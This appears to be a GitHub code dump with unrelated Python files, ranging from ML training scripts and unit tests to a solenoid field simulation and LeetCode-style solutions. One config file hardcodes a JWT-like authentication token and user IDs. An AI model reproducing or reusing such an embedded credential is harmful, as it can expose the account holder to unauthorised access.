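# [('the', 3), ('cat', 1), ('sat', 1), ('on', 1), ('mat', 1), ('end', 1)]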
\"sku\": self.sku,\n \"itemPrice\": self.itemPrice,\n \"salesSize\": self.salesSize,\n \"servingSize\": self.servingSize,\n \"calPerServing\": self.calPerServing,\n \"servingsPerContainer\": self.servingsPerContainer,\n \"includes\": self.includes,\n \"totalFat\": self.totalFat,\n \"saturatedFat\": self.saturatedFat,\n \"transFat\": self.transFat,\n \"cholesterol\": self.cholesterol,\n \"sodium\": self.sodium,\n \"totalCarb\": self.totalCarb,\n \"dietFiber\": self.dietFiber,\n \"totalSugars\": self.totalSugars,\n \"protein\": self.protein,\n \"vitaminD\": self.vitaminD,\n \"calcium\": self.calcium,\n \"iron\": self.iron,\n \"potassium\": self.potassium,\n \"ingredients\": self.ingredients,\n \"allergens\": self.allergens\n }","repo_name":"rithiksachdeva/Hobby-Projects","sub_path":"MealPlanning/APIRequests/productClass.py","file_name":"productClass.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"22322213176","text":"# Users login data\ntoken = \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Mjg5NzcyMTEsImlhdCI6MTU2MDg1ODI5N30.xg2gFHZHte6f8oOIgED2Aw9jstwAEl3P0k4ABy2ry74\"\nadmin_id = \"28977211\"\nuser_id = \"28977211\"\n\n# Data to insert to DB\nproject_data = {\n \"project\": {\n \"name\": \"Performance Testing\",\n \"short_description\": \"Prepare performance tests for web application.\",\n \"long_description\": \"Vulputate odio ut enim blandit volutpat maecenas\",\n \"number_of_members\": 1,\n \"technology\": \"Python, Locust\",\n \"tags\": \"WebDev, WebTest\",\n \"requirements\": \"none\",\n \"theme_color\": \"#3f51b5\",\n \"verified\": 1},\n \"token\": token\n}\n\nteam_data = {\n \"team\": {\n \"open\": 1,\n \"max_number_of_members\": 1,\n \"token\": token\n }\n}\n\nnews_data = {\n \"news\": {\n \"title\": \"Need one person to my groupe!\",\n \"body\": \"Hi, I've just created new team, please be welcome to join me!\",\n \"user_id\": user_id},\n \"token\": token\n}\n\nupdate_data = {\n \"name\": \"Dominik\",\n \"surname\": \"Slawkowski\",\n \"team_id\": None\n}\n\n\n# print codes and text function\ndef status(response):\n print(\"Resposne code:\", response.status_code)\n print(\"Response plain text: \", response.text)\n\n","repo_name":"235002/RE","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3904511991","text":"import threading\nimport time\n\nexit_flag = 0\n\nclass MyThread(threading.Thread):\n def __init__(self, threadId, name, delay):\n threading.Thread.__init__(self)\n self.threadId = threadId\n self.name = name\n self.delay = delay\n\n def run(self):\n print(\"Starting \" + self.name)\n print_time(self.name, 5, self.delay)\n print(\"Exiting \" + self.name)\n\ndef print_time(threadName, counter, delay):\n while counter:\n if exit_flag:\n threadName.exit()\n time.sleep(delay)\n print(\"%s: %s\" % (threadName, time.ctime(time.time())))\n counter -= 1\n\nthread1 = MyThread(1, \"Thread 1\", 1)\nthread2 = MyThread(2, \"Thread 2\", 2)\n\nthread1.start()\nthread2.start()\n# Wait for thread2 to exit\nthread2.join()\n\nprint(\"Exiting Main Thread\")","repo_name":"prubach/Python_Winter_2019_1","sub_path":"threads.py","file_name":"threads.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10786527467","text":"from dom_monitor import 
DomMonitor\nfrom client.requests_client import RequestClient\nfrom client.selenium_client import SeleniumClient\nfrom unittest import TestCase\n\n\nclass TestDomMonitor(TestCase):\n def test_exec(self):\n dom_monitor = DomMonitor()\n try:\n dom_monitor.exec(\"exec\", \"test.conf\")\n except SystemExit:\n self.fail('SystemExit exception doesn\\'t expected')\n except SystemError:\n self.fail('SystemError exception doesn\\'t expected')\n else:\n self.assertTrue(True)\n\n def test_exec_without_args(self):\n dom_monitor = DomMonitor()\n try:\n dom_monitor.exec()\n except SystemExit as e:\n self.assertEqual(1, e.code)\n else:\n self.fail('SystemExit exception expected')\n\n def test_exec_with_invalid_args(self):\n dom_monitor = DomMonitor()\n try:\n dom_monitor.exec(\"invalid,txt\")\n except SystemExit as e:\n self.assertEqual(1, e.code)\n else:\n self.fail('SystemExit exception expected')\n\n def test_get_client(self):\n client = DomMonitor.get_client(\"test\")\n self.assertTrue(callable(client.get_html))\n\n def test_get_client_requests(self):\n client = DomMonitor.get_client(\"requests\")\n self.assertTrue(isinstance(client, RequestClient))\n\n def test_get_client_selenium(self):\n client = DomMonitor.get_client(\"selenium\")\n self.assertTrue(isinstance(client, SeleniumClient))\n\n def test_get_database(self):\n config = {\n \"hostname\": \"localhost\",\n \"port\": 27017,\n \"username\": \"python\",\n \"password\": \"python\",\n \"database\": \"monitor\",\n }\n db = DomMonitor.get_database(\"test\", config)\n self.assertTrue(callable(db.get_exec_count))\n self.assertTrue(callable(db.get_previous_html))\n self.assertTrue(callable(db.update_exec_count))\n self.assertTrue(callable(db.update_previous_html))\n\n def test_get_notification(self):\n notification = DomMonitor.get_notification({\"slack\": {\"url\": \"\"}})\n self.assertTrue(callable(notification.send))\n\n def test_get_domain(self):\n domain = DomMonitor.get_domain(\"\", \"\", \"\", {\"slack\": {\"url\": \"test\"}})\n self.assertTrue(callable(domain.exec))\n\n","repo_name":"Taurin190/py-dom-monitor","sub_path":"test/test_dom_monitor.py","file_name":"test_dom_monitor.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16429835247","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport os\n\nprint (\"importing numpy\")\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\nprint (\"importing tensorFlow\")\nimport tensorflow as tf\n\nkeras = tf.keras\n\nprint (\"importing tensorFlow datasets\")\nimport tensorflow_datasets as tfds\ntfds.disable_progress_bar()\n\nprint (\"fin des imports\")\n\nSPLIT_WEIGHTS = (8, 1, 1)\nsplits = tfds.Split.TRAIN.subsplit(weighted=SPLIT_WEIGHTS)\n\nprint (\"Loading DataBase Cats vs Dogs\")\n(raw_train, raw_validation, raw_test), metadata = tfds.load(\n 'cats_vs_dogs', split=list(splits),\n with_info=True, as_supervised=True)\n\nprint (\"Loading ok\")\n\nget_label_name = metadata.features['label'].int2str\n\nfor image, label in raw_train.take(2):\n plt.figure()\n plt.imshow(image)\n plt.title(get_label_name(label))\n\n\nplt.show()\n\nIMG_SIZE = 160 # All images will be resized to 160x160\n\ndef format_example(image, label):\n image = tf.cast(image, tf.float32)\n image = (image/127.5) - 1\n image = tf.image.resize(image, (IMG_SIZE, IMG_SIZE))\n return image, label\n\nprint (\"formating the database\")\ntrain = raw_train.map(format_example)\nvalidation = 
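The try/except/else blocks in the DomMonitor tests above are what unittest's assertRaises context manager expresses directly, including access to the exit code. An equivalent sketch (the raise stands in for the real dom_monitor.exec() call):

import unittest

class TestExitCode(unittest.TestCase):
    def test_exec_without_args(self):
        with self.assertRaises(SystemExit) as ctx:
            raise SystemExit(1)  # stand-in for DomMonitor().exec()
        self.assertEqual(ctx.exception.code, 1)

if __name__ == "__main__":
    unittest.main()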
raw_validation.map(format_example)\ntest = raw_test.map(format_example)\n\n\nBATCH_SIZE = 32\nSHUFFLE_BUFFER_SIZE = 1000\n\nprint (\"shuffling the database\")\ntrain_batches = train.shuffle(SHUFFLE_BUFFER_SIZE).batch(BATCH_SIZE)\nvalidation_batches = validation.batch(BATCH_SIZE)\ntest_batches = test.batch(BATCH_SIZE)\n\nIMG_SHAPE = (IMG_SIZE, IMG_SIZE, 3)\n\nprint (\"get the base model\")\n# Create the base model from the pre-trained model MobileNet V2\nbase_model = tf.keras.applications.MobileNetV2(input_shape=IMG_SHAPE,\n include_top=False,\n weights='imagenet')\n","repo_name":"elbixos/M2_Connectionnisme","sub_path":"TransferLearning/Sources/transferLearning.py","file_name":"transferLearning.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"25716073195","text":"from torchvision import transforms, utils\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.utils.data.distributed import DistributedSampler\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.utils.data\nimport torch.nn.functional as F\nimport torchvision\nfrom torchvision import transforms\nfrom sklearn.metrics import classification_report\nfrom PIL import Image\nfrom sklearn import metrics\nfrom sklearn.metrics import roc_curve, auc, confusion_matrix\nimport copy\nimport numpy as np\n\nimport os\nimport time\nimport argparse\nfrom Dataloader import prepare_data, data_prefetcher\nimport apex\nfrom apex import amp\nfrom apex.fp16_utils import *\nfrom apex.parallel import DistributedDataParallel\nfrom apex.multi_tensor_apply import multi_tensor_applier\n\nN = 0\n\n\ndef reduce_tensor(tensor: torch.Tensor) -> torch.Tensor:\n rt = tensor.clone()\n torch.distributed.all_reduce(rt, op=torch.distributed.ReduceOp.SUM)\n return rt\n\n\ndef gather_tensor(tensor: torch.Tensor):\n rt = tensor.clone()\n var_list = [torch.zeros_like(rt) for _ in range(\n torch.distributed.get_world_size())]\n torch.distributed.all_gather(var_list, rt, async_op=False)\n return [i.cpu().numpy() for i in var_list]\n\n\ndef get_cm(AllLabels, AllValues):\n fpr, tpr, threshold = roc_curve(AllLabels, AllValues, pos_label=1)\n Auc = auc(fpr, tpr)\n m = t = 0\n\n for i in range(len(threshold)):\n if tpr[i] - fpr[i] > m:\n m = abs(-fpr[i]+tpr[i])\n t = threshold[i]\n AllPred = [int(i >= t) for i in AllValues]\n Acc = sum([AllLabels[i] == AllPred[i]\n for i in range(len(AllPred))]) / len(AllPred)\n\n Pos_num = sum(AllLabels)\n Neg_num = len(AllLabels) - Pos_num\n cm = confusion_matrix(AllLabels, AllPred)\n print(\"[AUC/{:.4f}] [Threshold/{:.4f}] [Acc/{:.4f}]\".format(Auc, t, Acc))\n print(\"{:.2f}% {:.2f}%\".format(\n cm[0][0] / Neg_num * 100, cm[0][1]/Neg_num * 100))\n print(\"{:.2f}% {:.2f}%\".format(\n cm[1][0] / Pos_num * 100, cm[1][1]/Pos_num * 100))\n\n return Auc, Acc\n\n\ndef run(args, model, optimizer, scheduler, loss_fn, train_loader, val_loader, epochs=20, device=\"cpu\"):\n auc = eval_model(args, model, optimizer, loss_fn, val_loader, device)\n\n for epoch in range(epochs):\n if args.local_rank == 0:\n print('Epoch [{}/{}]'.format(epoch, epochs))\n print('### Train ###')\n train_loader.sampler.set_epoch(epoch)\n auc = train_model(args, model, optimizer,\n loss_fn, train_loader, device)\n scheduler.step()\n\n auc = eval_model(args, model, optimizer, loss_fn, val_loader, device)\n if args.local_rank == 0 and auc >= 0.9950:\n torch.save(model.state_dict(),\n 
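With include_top=False, the MobileNetV2 backbone above ends in a feature map rather than class scores; the usual next steps, which the snippet stops short of, are freezing the base and stacking a small head. A hedged sketch reusing the script's names (head layout and hyperparameters are placeholders, not from the original):

base_model.trainable = False  # freeze pretrained weights for feature extraction

model = tf.keras.Sequential([
    base_model,
    tf.keras.layers.GlobalAveragePooling2D(),
    tf.keras.layers.Dense(1),  # single logit: cat vs. dog
])
model.compile(optimizer=tf.keras.optimizers.RMSprop(learning_rate=1e-4),
              loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),
              metrics=["accuracy"])
model.fit(train_batches, epochs=2, validation_data=validation_batches)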
'./40X_result/model_{}_{:.4f}.pkl'.format(epoch, auc))\n\n\ndef train_model(args, model, optimizer, loss_fn, dataloader, device):\n model.train()\n\n all_labels = []\n all_values = []\n training_loss = 0.0\n\n prefetcher = data_prefetcher(dataloader)\n inputs, targets = prefetcher.next()\n index = 0\n while inputs is not None:\n index += 1\n output = F.softmax(model(inputs), dim=1)\n loss = loss_fn(output, targets)\n\n optimizer.zero_grad()\n with amp.scale_loss(loss, optimizer) as scale_loss:\n scale_loss.backward()\n optimizer.step()\n\n reduced_loss = reduce_tensor(loss.data) / N\n training_loss += reduced_loss.item()\n\n targets, output = gather_tensor(targets), gather_tensor(output[:, 1])\n\n for j in range(torch.distributed.get_world_size()):\n all_labels.extend(targets[j])\n all_values.extend(output[j])\n\n if args.local_rank == 0 and (index+1) % 1 == 0:\n print('\\t[{}/{}] Loss: {:.4f}'.format(index +\n 1, len(dataloader), reduced_loss.item()))\n\n inputs, targets = prefetcher.next()\n if args.local_rank == 0:\n print(len(all_labels))\n all_labels, all_values = np.array(all_labels), np.array(all_values)\n Loss = training_loss / len(train_loader)\n AUC, Acc = get_cm(all_labels, all_values)\n\n print(\"Train Auc: {:.4f}, Acc: {:.4f}, Loss: {:.4f}\".format(\n AUC, Acc, Loss))\n\n\ndef eval_model(args, model, optimizer, loss_fn, dataloader, device):\n model.eval()\n all_labels = []\n all_values = []\n training_loss = 0\n\n model.eval()\n prefetcher = data_prefetcher(dataloader)\n inputs, targets = prefetcher.next()\n index = 0\n while inputs is not None:\n index += 1\n\n with torch.no_grad():\n output = F.softmax(model(inputs), dim=1)\n loss = loss_fn(output, targets)\n\n reduced_loss = reduce_tensor(loss.data) / N\n training_loss += reduced_loss.item()\n\n targets, output = gather_tensor(targets), gather_tensor(output[:, 1])\n\n for j in range(torch.distributed.get_world_size()):\n all_labels.extend(targets[j])\n all_values.extend(output[j])\n\n if args.local_rank == 0 and (index+1) % 1 == 0:\n print('\\t[{}/{}] Loss: {:.4f}'.format(index +\n 1, len(dataloader), reduced_loss.item()))\n inputs, targets = prefetcher.next()\n\n if args.local_rank == 0:\n print(len(all_labels))\n all_labels, all_values = np.array(all_labels), np.array(all_values)\n Loss = training_loss / len(train_loader)\n AUC, Acc = get_cm(all_labels, all_values)\n\n print(\"Val Auc: {:.4f}, Acc: {:.4f}, Loss: {:.4f}\".format(\n AUC, Acc, Loss))\n return AUC\n return\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(\n description='PyTorch Implementation of multiple Instance learning')\n parser.add_argument('--local_rank', type=int, default=0)\n parser.add_argument('--init_method', type=str)\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = get_parser()\n torch.backends.cudnn.benchmark = True\n torch.cuda.set_device(args.local_rank)\n torch.distributed.init_process_group(\n 'nccl',\n init_method=args.init_method\n )\n N = torch.distributed.get_world_size()\n\n train_loader, val_loader = prepare_data(args)\n\n device = torch.device(f\"cuda:{args.local_rank}\")\n\n model = torchvision.models.inception_v3(pretrained=True, aux_logits=False)\n model.fc = nn.Linear(2048, 2)\n\n model = apex.parallel.convert_syncbn_model(model).to(device)\n# optimizer = optim.SGD(model.parameters(),lr=1e-3, weight_decay=5e-4, momentum=0.95)\n optimizer = optim.Adam(model.parameters(), lr=1e-3, weight_decay=5e-4)\n\n model, optimizer = amp.initialize(model, optimizer,\n opt_level=\"O1\",\n keep_batchnorm_fp32=None)\n 
model = DistributedDataParallel(model, delay_allreduce=True)\n\n scheduler = optim.lr_scheduler.MultiStepLR(\n optimizer, milestones=[15, 20], gamma=0.1)\n # Spatial-ECA-Attention\n run(args,\n model,\n optimizer,\n scheduler,\n torch.nn.CrossEntropyLoss(),\n train_loader,\n val_loader,\n epochs=40,\n device=device\n )\n","repo_name":"Klunio/DL-thyroid","sub_path":"2-Segment/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7222,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"20765224864","text":"from typing import Union\n\n\n# Taken from https://github.com/dask/dask/blob/261bf174931580230717abca93fe172e166cc1e8/dask/utils.py\nbyte_sizes = {\n \"kB\": 10**3,\n \"MB\": 10**6,\n \"GB\": 10**9,\n \"TB\": 10**12,\n \"PB\": 10**15,\n \"KiB\": 2**10,\n \"MiB\": 2**20,\n \"GiB\": 2**30,\n \"TiB\": 2**40,\n \"PiB\": 2**50,\n \"B\": 1,\n \"\": 1,\n}\nbyte_sizes = {k.lower(): v for k, v in byte_sizes.items()}\nbyte_sizes.update({k[0]: v for k, v in byte_sizes.items() if k and \"i\" not in k})\nbyte_sizes.update({k[:-1]: v for k, v in byte_sizes.items() if k and \"i\" in k})\n\n\ndef parse_bytes(s: Union[float, str]) -> int:\n if isinstance(s, (int, float)):\n return int(s)\n s = s.replace(\" \", \"\")\n if not any(char.isdigit() for char in s):\n s = \"1\" + s\n\n for i in range(len(s) - 1, -1, -1):\n if not s[i].isalpha():\n break\n index = i + 1\n\n prefix = s[:index]\n suffix = s[index:]\n\n try:\n n = float(prefix)\n except ValueError as e:\n raise ValueError(f\"Could not interpret '{prefix}' as a number\") from e\n\n try:\n multiplier = byte_sizes[suffix.lower()]\n except KeyError as e:\n raise ValueError(f\"Could not interpret '{suffix}' as a byte unit\") from e\n\n result = n * multiplier\n return int(result)\n","repo_name":"ZYJ-q/test_0","sub_path":"nautilus_trader/persistence/funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25679413881","text":"import csv\nimport sys\nimport yaml\nimport re\nimport os\n\ndef main():\n if len(sys.argv) != 4:\n print(f\"USAGE: {sys.argv[0]} COUNT EXPORT_DIR OUT.csv\")\n exit(1)\n\n url_base = input(\"URL Base: \")\n with open(sys.argv[1], \"r\") as stream:\n try:\n counts = yaml.safe_load(stream)\n except yaml.YAMLError as exc:\n print(exc)\n exit(1)\n\n def lookup_count(file):\n base, _, ext = file.partition(\".\")\n if ext.upper() != 'PNG':\n print(f\"Skipping {file}\")\n return\n\n path = counts\n for component in base.split('_'):\n if type(path) is int:\n break\n if component not in path:\n print(f\"Skipping {file}\")\n return\n path = path[component]\n return (base, int(path))\n\n files = os.listdir(sys.argv[2])\n files.sort()\n with open(sys.argv[3], 'w') as out:\n w = csv.writer(out)\n w.writerow([\"image\", \"label\", \"item-count\"])\n for file in files:\n res = lookup_count(file)\n if not res: continue\n (base, count) = res\n w.writerow([f\"{url_base}/{file}\", file, count])\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"theKidOfArcrania/monopoly_deal_millionare_svg","sub_path":"scripts/export_pc.py","file_name":"export_pc.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23986793156","text":"#!/usr/bin/env python\n# Author: Daniel Pasut \n\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom 
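The parse_bytes helper above accepts plain numbers, SI and binary suffixes, and a bare unit (an implicit count of 1), with internal spaces stripped. Spot checks that follow directly from the code, assuming the function is in scope:

assert parse_bytes("100") == 100
assert parse_bytes("5kB") == 5_000
assert parse_bytes("5 kB") == 5_000          # spaces are stripped first
assert parse_bytes("MiB") == 2**20           # bare unit implies "1MiB"
assert parse_bytes("1.5GiB") == int(1.5 * 2**30)
assert parse_bytes(123.9) == 123             # numbers pass straight through int()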
mpl_toolkits.mplot3d import Axes3D\nfrom numpy import linalg as LA\nfrom pylab import *\nfrom tqdm import tqdm\nimport sys\nfrom scipy.integrate import odeint\nfrom scipy.integrate import ode\n\n# Solenoid\ngs = 30 # Grid spacing\nR = 0.5 # Radius of loop (mm)\nwr = 0.1 # Radius of wire (mm)\np = 0.1 # Pitch of wire, centre-to-centre (mm)\nN = 100 # Number of segments in single loop of wire\nn = int(sys.argv[1])#1 # Number of loops of wire\ntheta = np.empty(n*N)\nmu = 1 # Magnetic susceptibility\nI = 10 # Current\nC = mu*I/(4*np.pi)\n\n# Geometry\nxmin = -2.1\nxmax = 2.1\nymin = -2.1\nymax = 2.1\nzmin = -1.1\nzmax = p*n*2+1.1\nx = np.linspace(xmin, xmax, gs) # Positions for x\ny = np.linspace(ymin, ymax, gs) # Positions for y\nz = np.linspace(zmin, zmax, gs) # Positions for z\nY, Z = np.meshgrid(y, z, indexing='ij') # Grid for y/z\n\n# Cell/beads\nRb = 3.5e-6\nRc = 3.5e-5\nmuo = np.pi*4e-7\nmuw = 10e-3\nchi = 0.17\nrhob = 1.5e3\nrhoc = 1020\nrhow = 1000\ng = 9.81\n\nMagConst = (4*np.pi*Rb**3*chi/(3*muo))\nViscConst = 6*np.pi*muw*Rc\nm = (4/3)*np.pi*Rb**3*rhob + (4/3)*np.pi*(Rc**3-Rb**3)*rhoc\nVc = (4/3)*np.pi*Rc**3\nVb = (4/3)*np.pi*Rb**3\n\n# Book keeping\nBdotGradB = np.zeros([1, 3])\nV = np.zeros(3)\ntstep = 0.01\nt0 = 0\nt1 = 1\nt = np.arange(t0, t1, tstep)\n\nVt = g*(rhoc-rhow)*Vc/(6*np.pi*muw*Rc) #terminal velocity\nL = 1e-2\n\n# Function to do summation over all segments of wire\ndef find_B(pos, theta, R, N, wr):\n cross = 0\n for k in range(1, theta.size):\n rs = np.array([R*np.cos(theta[k]-np.pi/N),\n R*np.sin(theta[k]-np.pi/N),\n (p*(theta[k]-np.pi/N))/np.pi])\n r = pos - rs\n dl = np.array([R*(np.cos(theta[k])-np.cos(theta[k-1])),\n R*(np.sin(theta[k])-np.sin(theta[k-1])),\n p/N])\n cross += C * np.cross(dl, r) / LA.norm(r)**3\n return cross\n\n\n\ndef find_BdotGradB(pos):\n h = np.pi*R/N\n\n Bx, By, Bz = find_B(pos, theta, R, N, wr)\n\n Bx_right, By_right, Bz_right = find_B(pos + [0,h,0], theta, R, N, wr)\n Bx_left, By_left, Bz_left = find_B(pos - [0,h,0], theta, R, N, wr)\n Bx_up, By_up, Bz_up = find_B(pos + [0,0,h], theta, R, N, wr)\n Bx_down, By_down, Bz_down = find_B(pos - [0,0,h], theta, R, N, wr)\n\n bxy = (Bx_right - Bx_left) / 2*h\n byy = (By_right - By_left) / 2*h\n bzy = (Bz_right - Bz_left) / 2*h\n\n bxz = (Bx_up - Bx_down) / 2*h\n byz = (By_up - By_down) / 2*h\n bzz = (Bz_up - Bz_down) / 2*h\n\n # X derivatives calculated by divergence and curl of B\n bxx = -byy - bzz\n byx = bxy\n bzx = - bxz\n return [Bx*bxx + By*bxy + Bz*bxz, Bx*byx + By*byy + Bz*byz, Bx*bzx + By*bzy + Bz*bzz]\n\n\ndef func(X, t):\n xval = 0\n yval = 0\n zval = -1\n return [xval, yval, zval]\n\ndef funcmag(X, t):\n pos = np.array([X[0], X[1], X[2]])\n BdotGradB = find_BdotGradB(pos)\n xval = (1/Vt)*(Vb*chi/(muw*muo*6*np.pi*Rc))*(1/L)*BdotGradB[0]\n yval = (1/Vt)*(Vb*chi/(muw*muo*6*np.pi*Rc))*(1/L)*BdotGradB[1]\n zval = -1 + (1/Vt)*(Vb*chi/(muw*muo*6*np.pi*Rc))*(1/L)*BdotGradB[2]\n return [xval, yval, zval]\n\n\ndef run(X0):\n X = odeint(func, X0, t)\n Xmag = odeint(funcmag,X0,t)\n #print(Xmag[:,2])\n return X, Xmag\n\n\n\n\nif __name__ == '__main__':\n for i in range(0, theta.size):\n theta[i] = i*2*np.pi/N\n\n\n #fig = plt.subplots(figsize=(20, 16), dpi=600)\n\n #plt.plot(t,X[:,2],'r-', lw=5, label='No Magnetic Field')\n #plt.plot(t,Xmag[Xmag[:,2]>2*p*n,2],'b-', lw=5, label='Magnetic Field')\n #plt.axhline(y=2, color='k', linestyle='-',lw=5, label='Bottom of Dish')\n #plt.xlabel('t/T', fontsize=30)\n #plt.ylabel('Z/L', fontsize=30)\n #plt.tick_params(axis='both', which='major', labelsize=30)\n 
#plt.legend(['No Magnetic Field', 'Magnetic Field', 'Bottom of Dish'], fontsize=30)\n #plt.savefig('diff.png', transparent=True,\n # bbox_inches='tight', pad_inches=0)\n #plt.savefig('diff.jpg', bbox_inches='tight', pad_inches=0)\n #plt.show()\n\n\n fig = plt.figure()#figsize=(20, 16), dpi=600, facecolor='w', edgecolor='k')\n ax = fig.gca(projection='3d')\n\n X0 = [0, 0, 2*p*n+1]\n X, Xmag = run(X0)\n ax.plot(X[:,0],X[:,1],X[:,2], label='test',LineWidth=3)\n\n for i in tqdm(range(0, 10)):\n thetaval = i*2*np.pi/10\n X0= [np.cos(thetaval), np.sin(thetaval), 2*p*n+1]\n X, Xmag = run(X0)\n\n ax.plot(Xmag[Xmag[:,2]>2*p*n,0],Xmag[Xmag[:,2]>2*p*n,1] ,Xmag[Xmag[:,2]>2*p*n,2], label='wire', LineWidth=5)\n\n ax.set_xlabel('\\n' + 'X axis')#, fontsize=30, linespacing=4)\n ax.set_ylabel('\\n' + 'Y axis')#, fontsize=30, linespacing=4)\n ax.set_zlabel('\\n' + 'Z axis')#, fontsize=30, linespacing=4)\n #ax.xaxis._axinfo['label']['space_factor'] = 100\n #plt.legend(['Magnetic Field', 'No Magnetic Field'], fontsize=30)\n\n #plt.tick_params(axis='both', which='major', labelsize=30)\n #plt.savefig('traj_test.png', transparent=True,\n # bbox_inches='tight', pad_inches=0)\n plt.show()\n","repo_name":"dpasut/solenoid-magnetic-field","sub_path":"forces.py","file_name":"forces.py","file_ext":"py","file_size_in_byte":5085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"12210543530","text":"# importing the requests library \nimport requests \n \n# api-endpoint \nURL = \"https://api.github.com/events\"\n \n# location given here \nlocation = \"delhi technological university\"\n \n# defining a params dict for the parameters to be sent to the API \nPARAMS = {'address':location} \n\npayload = {'key1': 'value1', 'key2': 'value2'}\n#r = requests.get('http://httpbin.org/get', params=payload)\nr = requests.post('http://httpbin.org/post', data = {'key':'value'})\n\n# sending get request and saving the response as response object \n#r = requests.get(url = URL)\n \n# extracting data in json format \n#data = r.url() \n\nprint(r.text)\n \n\"\"\" \n# extracting latitude, longitude and formatted address \n# of the first matching location \nlatitude = data['results'][0]['geometry']['location']['lat'] \nlongitude = data['results'][0]['geometry']['location']['lng'] \nformatted_address = data['results'][0]['formatted_address'] \n \n# printing the output \nprint(\"Latitude:%s\\nLongitude:%s\\nFormatted Address:%s\"\n %(latitude, longitude,formatted_address)) \n\"\"\"","repo_name":"richardg999/Random-JavaScript-code","sub_path":"http_python.py","file_name":"http_python.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2016177900","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 2 10:19:09 2018\n\n@author: pineapple\n\"\"\"\n\n'''\n给定一个非空的整数数组,返回其中出现频率前 k 高的元素。\n\n示例 1:\n\n输入: nums = [1,1,1,2,2,3], k = 2\n输出: [1,2]\n示例 2:\n\n输入: nums = [1], k = 1\n输出: [1]\n说明:\n\n你可以假设给定的 k 总是合理的,且 1 ≤ k ≤ 数组中不相同的元素的个数。\n你的算法的时间复杂度必须优于 O(n log n) , n 是数组的大小\n'''\n\n'''\n我的:时间复杂度O(n) 空间复杂度O(n)\n思路:将数组的元素频率用hash记录下来\n 然后将hash的键值对调用hash_count记录下来,\n 然后在按照hash_count的keys()排序输出对于的元素\n'''\n\nclass Solution(object):\n def topKFrequent(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: List[int]\n \"\"\"\n hash = {}\n for num in nums:\n hash[num] = hash.get(num, 0) + 1\n hash_count = {}\n for key,value in hash.items():\n if value not in 
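The trajectory code above integrates with scipy.integrate.odeint, whose right-hand side takes (X, t) and returns the state derivative. A self-contained example of the same call pattern, using the script's field-free case (constant unit sinking speed):

import numpy as np
from scipy.integrate import odeint

def rhs(X, t):
    # No magnetic term: the bead just sinks at unit non-dimensional speed.
    return [0.0, 0.0, -1.0]

t = np.arange(0.0, 1.0, 0.01)
X = odeint(rhs, [0.0, 0.0, 1.0], t)  # start at z = 1
print(X[-1])                          # ends near [0, 0, 0.01]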
hash_count:\n hash_count[value] = [key]\n else:\n hash_count[value].append(key)\n keys = hash_count.keys()[:]\n ans = []\n i = 0\n while i < k:\n n = hash_count[keys.pop()]\n for j in n:\n ans.append(j)\n i+=len(n)\n return ans\n\nnums = [6,0,1,4,9,7,-3,1,-4,-8,4,-7,-3,3,2,-3,9,5,-4,0]\nk = 6\n\n'''\n别人的:时间复杂度O(nlogk) 空间复杂度O(n)\n思路:用优先队列来维护一个长度为k的队列,优先值为元素的个数计数\n'''\n\nclass Solution(object):\n def topKFrequent(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: List[int]\n \"\"\"\n hash = {}\n for num in nums:\n hash[num] = hash.get(num, 0) + 1\n import heapq\n heap = []\n for key,value in hash.items():\n if len(heap) < k:\n heapq.heappush(heap, (value, key))\n else:\n if heap[0][0] < value:\n heapq.heappop(heap)\n heapq.heappush(heap, (value, key))\n return [i[1] for i in heap]\n\n","repo_name":"pppineapple/LeetCode","sub_path":"Algorithms/前K个高频元素.py","file_name":"前K个高频元素.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28020345942","text":"newtonMemo = [[int(0)] * 1001 for _ in range(1001)]\n\ndef newton(n, k):\n if k==0 or n==k:\n return 1\n if newtonMemo[n][k] != 0:\n return newtonMemo[n][k]\n ret = newton(n-1, k) + newton(n-1, k-1)\n newtonMemo[n][k] = ret\n return ret\n\nclass Solution:\n def numberOfWays(self, startPos: int, endPos: int, k: int) -> int:\n stepsRight = abs(endPos - startPos)\n if (k - stepsRight) % 2 == 1 or stepsRight > k:\n return 0\n stepsRight += (k - stepsRight) // 2\n #return 